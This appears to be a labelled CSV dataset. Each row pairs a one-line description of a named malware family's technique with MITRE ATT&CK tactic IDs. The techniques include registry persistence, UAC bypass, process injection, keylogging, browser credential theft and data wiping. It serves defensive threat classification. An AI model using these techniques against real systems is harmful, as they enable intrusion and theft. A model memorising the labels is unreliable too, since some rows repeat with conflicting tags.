Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.,['TA0040:Impact']
Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.,['TA0003:Persistence']
Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.,['TA0040:Impact']
Industroyer decrypts code to connect to a remote C2 server.,['TA0005:Defense Evasion']
Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.,['TA0010:Exfiltration']
Industroyer’s data wiper component enumerates specific files on all the Windows drives.,['TA0007:Discovery']
Industroyer downloads a shellcode payload from a remote C2 server and loads it into memory.,['TA0011:Command and Control']
Industroyer used Tor nodes for C2.,['TA0011:Command and Control']
Industroyer uses a custom port scanner to map out a network.,['TA0007:Discovery']
Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.,['TA0005:Defense Evasion']
Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.,['TA0011:Command and Control']
Industroyer has a data wiper component that enumerates keys in the Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.,['TA0007:Discovery']
Industroyer can enumerate remote computers in the compromised network.,['TA0007:Discovery']
Industroyer’s data wiper module writes zeros into the registry keys in SYSTEM\CurrentControlSet\Services to render a system inoperable.,['TA0040:Impact']
Industroyer collects the victim machine’s Windows GUID.,['TA0007:Discovery']
Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses.,['TA0007:Discovery']
Industroyer can use supplied user credentials to execute processes and stop services.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Industroyer’s main backdoor connected to a remote C2 server using HTTPS.,['TA0011:Command and Control']
Industroyer can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Industroyer2 has the ability to cyclically enumerate running processes such as PServiceControl.exe, PService_PDD.exe, and other targets supplied through a hardcoded configuration.",['TA0007:Discovery']
InnaputRAT has a command to delete files.,['TA0005:Defense Evasion']
InnaputRAT enumerates directories and obtains file attributes on a system.,['TA0007:Discovery']
InnaputRAT variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.,['TA0005:Defense Evasion']
InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.,['TA0005:Defense Evasion']
InnaputRAT uses the API call ShellExecuteW for execution.,['TA0002:Execution']
InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.,['TA0005:Defense Evasion']
Some InnaputRAT variants establish persistence by modifying the Registry key HKU\\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe .,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
InnaputRAT gathers volume drive information and system information.,['TA0007:Discovery']
InnaputRAT launches a shell to execute commands on the victim’s machine.,['TA0002:Execution']
Some InnaputRAT variants create a new Windows service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
InvisiMole can enumerate windows and child windows on a compromised host.,['TA0007:Discovery']
InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.,['TA0009:Collection']
InvisiMole can use zlib to compress and decompress data.,['TA0009:Collection']
InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.,['TA0009:Collection']
InvisiMole can inject its code into a trusted process via the APC queue.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
InvisiMole can record sound using input audio devices.,['TA0009:Collection']
InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.,['TA0009:Collection']
InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"InvisiMole can use the ITaskService, ITaskDefinition and ITaskSettings COM interfaces to schedule a task.",['TA0002:Execution']
InvisiMole can register itself for execution and persistence via the Control Panel.,['TA0005:Defense Evasion']
InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.,['TA0011:Command and Control']
"InvisiMole can collect data from the system, and can monitor changes in specified directories.",['TA0009:Collection']
InvisiMole can collect jpeg files from connected MTP devices.,['TA0009:Collection']
"InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.",['TA0005:Defense Evasion']
InvisiMole has a command to disable routing and the Firewall on the victim’s machine.,['TA0005:Defense Evasion']
"InvisiMole can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.",['TA0005:Defense Evasion']
InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.,['TA0002:Execution']
InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.,['TA0004:Privilege Escalation']
InvisiMole can spread within a network via the BlueKeep and EternalBlue vulnerabilities in RDP and SMB respectively.,['TA0008:Lateral Movement']
InvisiMole InvisiMole can identify proxy servers used by the victim and use them for C2 communication.,['TA0011:Command and Control']
InvisiMole has been configured with several servers available for alternate C2 communications.,['TA0011:Command and Control']
InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.,['TA0005:Defense Evasion']
InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask.,['TA0007:Discovery']
InvisiMole can create hidden system directories.,['TA0005:Defense Evasion']
InvisiMole has executed legitimate tools in hidden windows.,['TA0005:Defense Evasion']
InvisiMole has undergone regular technical improvements in an attempt to evade detection.,['TA0005:Defense Evasion']
InvisiMole can upload files to the victim's machine for operations.,['TA0011:Command and Control']
InvisiMole can can remove all system restore points.,['TA0040:Impact']
"InvisiMole can function as a proxy to create a server that relays communication between the client and C&C server, or between two clients.",['TA0011:Command and Control']
InvisiMole can use a JavaScript file as part of its execution chain.,['TA0002:Execution']
InvisiMole can capture keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
InvisiMole has used ListPlanting to inject code into a trusted process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
InvisiMole has a command to list account information on the victim’s machine.,['TA0007:Discovery']
InvisiMole determines a working directory where it stores all the gathered data about the compromised machine.,['TA0009:Collection']
"InvisiMole can deliver trojanized versions of software and documents, relying on user execution.",['TA0002:Execution']
InvisiMole has attempted to disguise itself by registering under a seemingly legitimate service name.,['TA0005:Defense Evasion']
"InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.",['TA0005:Defense Evasion']
"InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.",['TA0005:Defense Evasion']
InvisiMole can use winapiexec tool for indirect execution of ShellExecuteW and CreateProcessA.,['TA0002:Execution']
InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols.,['TA0007:Discovery']
InvisiMole can disconnect previously connected remote drives.,['TA0005:Defense Evasion']
InvisiMole can gather network share information.,['TA0007:Discovery']
InvisiMole has used TCP to download additional modules.,['TA0011:Command and Control']
InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.,['TA0011:Command and Control']
"InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.",['TA0005:Defense Evasion']
InvisiMole can inject its backdoor as a portable executable into a target process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
InvisiMole can obtain a list of running processes.,['TA0007:Discovery']
InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"InvisiMole can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.",['TA0011:Command and Control']
"InvisiMole can enumerate Registry values, keys, and data.",['TA0007:Discovery']
InvisiMole can place a lnk file in the Startup Folder to achieve persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
InvisiMole has used rundll32.exe for execution.,['TA0005:Defense Evasion']
InvisiMole has used scheduled tasks named MSST and \Microsoft\Windows\Autochk\Scheduled to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.",['TA0009:Collection']
"InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall.",['TA0007:Discovery']
InvisiMole has used Windows services as a way to execute its malicious payload.,['TA0002:Execution']
InvisiMole can use a .lnk shortcut for the Control Panel to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.",['TA0007:Discovery']
InvisiMole uses variations of a simple XOR encryption routine for C&C communications.,['TA0011:Command and Control']
"InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"InvisiMole can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.",['TA0007:Discovery']
"InvisiMole gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.",['TA0007:Discovery']
InvisiMole lists local users and session information.,['TA0007:Discovery']
InvisiMole can obtain running services on the victim.,['TA0007:Discovery']
InvisiMole gathers the local system time from the victim’s machine.,['TA0007:Discovery']
"InvisiMole can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.",['TA0008:Lateral Movement']
InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times.,['TA0005:Defense Evasion']
InvisiMole can remotely activate the victim’s webcam to capture content.,['TA0009:Collection']
InvisiMole uses HTTP for C2 communications.,['TA0011:Command and Control']
InvisiMole can launch a remote shell to execute commands.,['TA0002:Execution']
"InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Invoke-PSImage can be used to embed payload data within a new image file.,['TA0005:Defense Evasion']
Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.,['TA0005:Defense Evasion']
IronNetInjector has the ability to decrypt embedded .NET and PE payloads.,['TA0005:Defense Evasion']
"IronNetInjector has the ability to inject a DLL into running processes, including the IronNetInjector DLL into explorer.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"IronNetInjector can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.",['TA0005:Defense Evasion']
IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc.,['TA0005:Defense Evasion']
IronNetInjector can identify processes via C# methods such as GetProcessesByName and running Tasklist with the Python os.popen function.,['TA0007:Discovery']
IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.,['TA0002:Execution']
IronNetInjector has used a task XML file named mssch.xml to run an IronPython script when a user logs in or when specific system events are created.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ixeshe can collect data from a local system.,['TA0009:Collection']
Ixeshe has a command to delete a file from the machine.,['TA0005:Defense Evasion']
Ixeshe can list file and directory information.,['TA0007:Discovery']
Ixeshe sets its own executable file's attributes to hidden.,['TA0005:Defense Evasion']
Ixeshe can download and execute additional files.,['TA0011:Command and Control']
"Ixeshe has used registry values and file names associated with Adobe software, such as AcroRd32.exe.",['TA0005:Defense Evasion']
Ixeshe can list running processes.,['TA0007:Discovery']
Ixeshe can achieve persistence by adding itself to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.,['TA0011:Command and Control']
Ixeshe collects the computer name of the victim's system during the initial infection.,['TA0007:Discovery']
"Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system.",['TA0007:Discovery']
Ixeshe collects the username from the victim’s machine.,['TA0007:Discovery']
Ixeshe can list running services.,['TA0007:Discovery']
Ixeshe uses HTTP for command and control.,['TA0011:Command and Control']
Ixeshe is capable of executing commands via cmd.,['TA0002:Execution']
JCry has encrypted files and demanded Bitcoin to decrypt those files.,['TA0040:Impact']
JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.,['TA0040:Impact']
JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.,['TA0002:Execution']
JCry has used PowerShell to execute payloads.,['TA0002:Execution']
JCry has created payloads in the Startup directory to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
JCry has used VBS scripts.,['TA0002:Execution']
JCry has used cmd.exe to launch PowerShell.,['TA0002:Execution']
A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.,['TA0009:Collection']
JHUHUGIT has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object .,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Many strings in JHUHUGIT are obfuscated with a XOR algorithm.,['TA0005:Defense Evasion']
JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.,['TA0004:Privilege Escalation']
"JHUHUGIT tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.",['TA0011:Command and Control']
The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files.,['TA0005:Defense Evasion']
JHUHUGIT can retrieve an additional payload from its C2 server. JHUHUGIT has a command to download files to the victim’s machine.,['TA0011:Command and Control']
JHUHUGIT has registered a Windows shell script under the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
JHUHUGIT obtains a list of running processes on the victim.,['TA0007:Discovery']
JHUHUGIT performs code injection injecting its own functions to browser processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
JHUHUGIT is executed using rundll32.exe.,['TA0005:Defense Evasion']
JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"A JHUHUGIT variant takes screenshots by simulating the user pressing the ""Take Screenshot"" key , accessing the screenshot saved in the clipboard, and converting it to a JPG image.",['TA0009:Collection']
A JHUHUGIT variant encodes C2 POST data base64.,['TA0011:Command and Control']
JHUHUGIT obtains a build identifier as well as victim hard drive information from Windows registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum. Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name.,['TA0007:Discovery']
A JHUHUGIT variant gathers network interface card information.,['TA0007:Discovery']
JHUHUGIT variants have communicated with C2 servers over HTTP and HTTPS.,['TA0011:Command and Control']
JHUHUGIT uses a .bat file to execute a .dll.,['TA0002:Execution']
JHUHUGIT has registered itself as a service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
A JPIN variant downloads the backdoor payload via the BITS service.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
JPIN can lower security settings by changing Registry keys.,['TA0005:Defense Evasion']
JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.,['TA0005:Defense Evasion']
JPIN can communicate over FTP.,['TA0011:Command and Control']
JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe.,['TA0007:Discovery']
JPIN can download files and upgrade itself.,['TA0011:Command and Control']
JPIN contains a custom keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
JPIN can obtain the permissions of the victim user.,['TA0007:Discovery']
JPIN can send email over SMTP.,['TA0011:Command and Control']
A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.,['TA0005:Defense Evasion']
JPIN can list running processes.,['TA0007:Discovery']
JPIN can inject content into lsass.exe to load a module.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
JPIN can enumerate Registry keys.,['TA0007:Discovery']
JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.,['TA0007:Discovery']
JPIN can obtain system information such as OS version and disk space.,['TA0007:Discovery']
"JPIN can obtain network information, including DNS, IP, and proxies.",['TA0007:Discovery']
JPIN can obtain the victim user name.,['TA0007:Discovery']
JPIN can list running services.,['TA0007:Discovery']
JPIN can use the command-line utility cacls.exe to change file permissions.,['TA0002:Execution']
JPIN can use the command-line utility cacls.exe to change file permissions.,['TA0005:Defense Evasion']
JSS Loader has the ability to download malicious executables to a compromised host.,['TA0011:Command and Control']
JSS Loader can download and execute JavaScript files.,['TA0002:Execution']
JSS Loader has been executed through malicious attachments contained in spearphishing emails.,['TA0002:Execution']
JSS Loader has the ability to download and execute PowerShell scripts.,['TA0002:Execution']
JSS Loader has the ability to launch scheduled tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments.,['TA0001:Initial Access']
JSS Loader can download and execute VBScript files.,['TA0002:Execution']
Janicab captured audio and sent it out to a C2 server.,['TA0009:Collection']
Janicab used a valid AppleDeveloperID to sign the code to get past security restrictions.,['TA0005:Defense Evasion']
Janicab used a cron job for persistence on Mac devices.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Janicab captured screenshots and sent them out to a C2 server.,['TA0009:Collection']
Javali can use large obfuscated libraries to hinder detection and analysis.,['TA0005:Defense Evasion']
"Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.",['TA0006:Credential Access']
Javali can use DLL side-loading to load malicious DLLs into legitimate executables.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Javali can read C2 information from Google Documents and YouTube.,['TA0011:Command and Control']
Javali can download payloads from remote C2 servers.,['TA0011:Command and Control']
"Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.",['TA0002:Execution']
Javali has achieved execution through victims clicking links to malicious websites.,['TA0002:Execution']
Javali has used the MSI installer to download and execute malicious payloads.,['TA0005:Defense Evasion']
Javali can monitor processes for open browsers and custom banking applications.,['TA0007:Discovery']
Javali has been delivered as malicious e-mail attachments.,['TA0001:Initial Access']
Javali has been delivered via malicious links embedded in e-mails.,['TA0001:Initial Access']
Javali has used embedded VBScript to download malicious payloads from C2.,['TA0002:Execution']
KARAE can use public cloud-based storage providers for command and control.,['TA0011:Command and Control']
"KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.",['TA0001:Initial Access']
"KARAE can upload and download files, including second-stage malware.",['TA0011:Command and Control']
KARAE can collect system information.,['TA0007:Discovery']
KEYMARBLE has the capability to delete files off the victim’s machine.,['TA0005:Defense Evasion']
KEYMARBLE has a command to search for files on the victim’s machine.,['TA0007:Discovery']
KEYMARBLE can upload files to the victim’s machine and can download additional payloads.,['TA0011:Command and Control']
KEYMARBLE has a command to create Registry entries for storing data under HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath.,['TA0005:Defense Evasion']
KEYMARBLE can obtain a list of running processes on the system.,['TA0007:Discovery']
KEYMARBLE can capture screenshots of the victim’s machine.,['TA0009:Collection']
KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.,['TA0011:Command and Control']
"KEYMARBLE has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.",['TA0007:Discovery']
KEYMARBLE gathers the MAC address of the victim’s machine.,['TA0007:Discovery']
KEYMARBLE can execute shell commands using cmd.exe.,['TA0002:Execution']
KEYPLUG can use TLS-encrypted WebSocket Protocol for C2.,['TA0011:Command and Control']
The KEYPLUG Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums.,['TA0011:Command and Control']
KEYPLUG can decode its configuration file to determine C2 protocols.,['TA0005:Defense Evasion']
KEYPLUG can use a hardcoded one-byte XOR encoded configuration file.,['TA0005:Defense Evasion']
KEYPLUG can use TCP and KCP over UDP for C2 communication.,['TA0011:Command and Control']
KEYPLUG has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains.,['TA0011:Command and Control']
KEYPLUG can obtain the current tick count of an infected computer.,['TA0007:Discovery']
KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol for C2.,['TA0011:Command and Control']
KGH_SPY can collect credentials from WINSCP.,['TA0006:Credential Access']
"KGH_SPY has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.",['TA0006:Credential Access']
KGH_SPY can send a file containing victim system information to C2.,['TA0009:Collection']
KGH_SPY can decrypt encrypted strings and write them to a newly created folder.,['TA0005:Defense Evasion']
KGH_SPY has used encrypted strings in its installer.,['TA0005:Defense Evasion']
KGH_SPY can exfiltrate collected information from the host to the C2 server.,['TA0010:Exfiltration']
KGH_SPY can enumerate files and directories on a compromised host.,['TA0007:Discovery']
KGH_SPY has the ability to download and execute code from remote servers.,['TA0011:Command and Control']
KGH_SPY can perform keylogging by polling the GetAsyncKeyState function.,"['TA0009:Collection', 'TA0006:Credential Access']"
"KGH_SPY can save collected system information to a file named ""info"" before exfiltration.",['TA0009:Collection']
KGH_SPY can harvest data from mail clients.,['TA0009:Collection']
KGH_SPY has the ability to set the HKCU\Environment\UserInitMprLogonScript Registry key to execute logon scripts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KGH_SPY has been spread through Word documents containing malicious macros.,['TA0002:Execution']
KGH_SPY has masqueraded as a legitimate Windows tool.,['TA0005:Defense Evasion']
KGH_SPY can execute PowerShell commands on the victim's machine.,['TA0002:Execution']
KGH_SPY can collect information on installed applications.,['TA0007:Discovery']
KGH_SPY can collect drive information from a compromised host.,['TA0007:Discovery']
KGH_SPY can send data to C2 with HTTP POST requests.,['TA0011:Command and Control']
KGH_SPY has the ability to set a Registry key to run a cmd.exe command.,['TA0002:Execution']
KGH_SPY can collect credentials from the Windows Credential Manager.,['TA0006:Credential Access']
KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure.,['TA0005:Defense Evasion']
KOCTOPUS has obfuscated scripts with the BatchEncryption tool.,['TA0005:Defense Evasion']
KOCTOPUS has deobfuscated itself before executing its commands.,['TA0005:Defense Evasion']
KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.,['TA0005:Defense Evasion']
KOCTOPUS has used -WindowsStyle Hidden to hide the command window.,['TA0005:Defense Evasion']
KOCTOPUS has executed a PowerShell command to download a file to the system.,['TA0011:Command and Control']
KOCTOPUS has relied on victims clicking a malicious document for execution.,['TA0002:Execution']
KOCTOPUS has relied on victims clicking on a malicious link delivered via email.,['TA0002:Execution']
KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries.,['TA0005:Defense Evasion']
KOCTOPUS has added and deleted keys from the Registry.,['TA0005:Defense Evasion']
KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution.,['TA0002:Execution']
KOCTOPUS has used PowerShell commands to download additional files.,['TA0002:Execution']
KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.,['TA0011:Command and Control']
KOCTOPUS can set the AutoRun Registry key with a PowerShell command.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KOCTOPUS has been distributed via spearphishing emails with malicious attachments.,['TA0001:Initial Access']
KOCTOPUS has been distributed as a malicious link within an email.,['TA0001:Initial Access']
KOCTOPUS has checked the OS version using `wmic.exe` and the `find` command.,['TA0007:Discovery']
KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.,['TA0002:Execution']
KOCTOPUS has used `cmd.exe` and batch files for execution.,['TA0002:Execution']
KOMPROGO is capable of retrieving information about the infected system.,['TA0007:Discovery']
KOMPROGO is capable of creating a reverse shell.,['TA0002:Execution']
KOMPROGO is capable of running WMI queries.,['TA0002:Execution']
KONNI has encrypted data and files prior to exfiltration.,['TA0009:Collection']
"KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify"".","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
KONNI had a feature to steal data from the clipboard.,['TA0009:Collection']
KONNI has modified ComSysApp service to load the malicious DLL payload.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"KONNI can steal profiles from Firefox, Chrome, and Opera.",['TA0006:Credential Access']
KONNI has stored collected information and discovered processes in a tmp file.,['TA0009:Collection']
KONNI has used certutil to download and decode base64 encoded strings and has also devoted a custom section to performing all the components of the deobfuscation process.,['TA0005:Defense Evasion']
KONNI is heavily obfuscated and includes encrypted configuration files.,['TA0005:Defense Evasion']
KONNI has sent data and files to its C2 server.,['TA0010:Exfiltration']
KONNI has used FTP to exfiltrate reconnaissance data out.,['TA0010:Exfiltration']
KONNI can delete files.,['TA0005:Defense Evasion']
"A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.",['TA0007:Discovery']
KONNI can download files and execute them on the victim’s machine.,['TA0011:Command and Control']
KONNI has executed malicious JavaScript code.,['TA0002:Execution']
KONNI has the capability to perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
KONNI has relied on a victim to enable malicious macros within an attachment delivered via email.,['TA0002:Execution']
KONNI has pretended to be the xmlProv Network Provisioning service.,['TA0005:Defense Evasion']
"KONNI has created a shortcut called ""Anti virus service.lnk"" in an apparent attempt to masquerade as a legitimate file.",['TA0005:Defense Evasion']
"KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.",['TA0005:Defense Evasion']
KONNI has hardcoded API calls within its functions to use on the victim's machine.,['TA0002:Execution']
KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
KONNI used PowerShell to download and execute a specific 64-bit version of the malware.,['TA0002:Execution']
KONNI has used the command cmd /c tasklist to get a snapshot of the current processes on the target machine.,['TA0007:Discovery']
A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KONNI has used Rundll32 to execute its loader for privilege escalation purposes.,['TA0005:Defense Evasion']
KONNI can take screenshots of the victim’s machine.,['TA0009:Collection']
A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KONNI has been packed for obfuscation.,['TA0005:Defense Evasion']
KONNI has been delivered via spearphishing campaigns through a malicious Word document.,['TA0001:Initial Access']
KONNI has used a custom base64 key to encode stolen data before exfiltration.,['TA0011:Command and Control']
KONNI has used AES to encrypt C2 traffic.,['TA0011:Command and Control']
"KONNI can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim’s machine and has used cmd /c systeminfo command to get a snapshot of the current system state of the target machine.",['TA0007:Discovery']
KONNI can collect the IP address from the victim’s machine.,['TA0007:Discovery']
KONNI has used net session on the victim's machine.,['TA0007:Discovery']
KONNI can collect the username from the victim’s machine.,['TA0007:Discovery']
KONNI has used HTTP POST for C2.,['TA0011:Command and Control']
KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.,['TA0002:Execution']
KONNI has registered itself as a service using its export function.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
KOPILUWAK can gather information from compromised hosts.,['TA0009:Collection']
KOPILUWAK has exfiltrated collected data to its C2 via POST requests.,['TA0010:Exfiltration']
KOPILUWAK had used Javascript to perform its core functions.,['TA0002:Execution']
KOPILUWAK has piped the results from executed C2 commands to `%TEMP%\result2.dat` on the local machine.,['TA0009:Collection']
KOPILUWAK has gained execution through malicious attachments.,['TA0002:Execution']
KOPILUWAK can use netstat and Net to discover network shares.,['TA0007:Discovery']
KOPILUWAK can enumerate current running processes on the targeted machine.,['TA0007:Discovery']
KOPILUWAK has been delivered to victims as a malicious email attachment.,['TA0001:Initial Access']
KOPILUWAK can discover logical drive information on compromised hosts.,['TA0007:Discovery']
KOPILUWAK can use Arp to discover a target's network configuration setttings.,['TA0007:Discovery']
"KOPILUWAK can use netstat, Arp, and Net to discover current TCP connections.",['TA0007:Discovery']
"KOPILUWAK can conduct basic network reconnaissance on the victim machine with `whoami`, to get user details.",['TA0007:Discovery']
KOPILUWAK has used HTTP POST requests to send data to C2.,['TA0011:Command and Control']
Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.,['TA0005:Defense Evasion']
Kasidet has the ability to search for a given filename on a victim.,['TA0007:Discovery']
Kasidet has the ability to download and execute additional files.,['TA0011:Command and Control']
Kasidet has the ability to initiate keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Kasidet has the ability to search for a given process name in processes currently running in the system.,['TA0007:Discovery']
Kasidet creates a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Kasidet has the ability to initiate keylogging and screen captures.,['TA0009:Collection']
